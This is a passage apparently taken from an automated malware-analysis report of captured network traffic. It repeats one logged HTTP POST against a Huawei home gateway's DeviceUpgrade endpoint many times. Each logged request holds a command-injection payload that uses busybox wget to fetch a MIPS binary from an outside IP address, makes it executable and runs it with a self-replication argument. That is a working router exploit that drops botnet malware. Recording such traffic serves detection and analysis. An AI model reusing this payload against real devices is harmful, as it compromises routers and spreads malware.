/tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 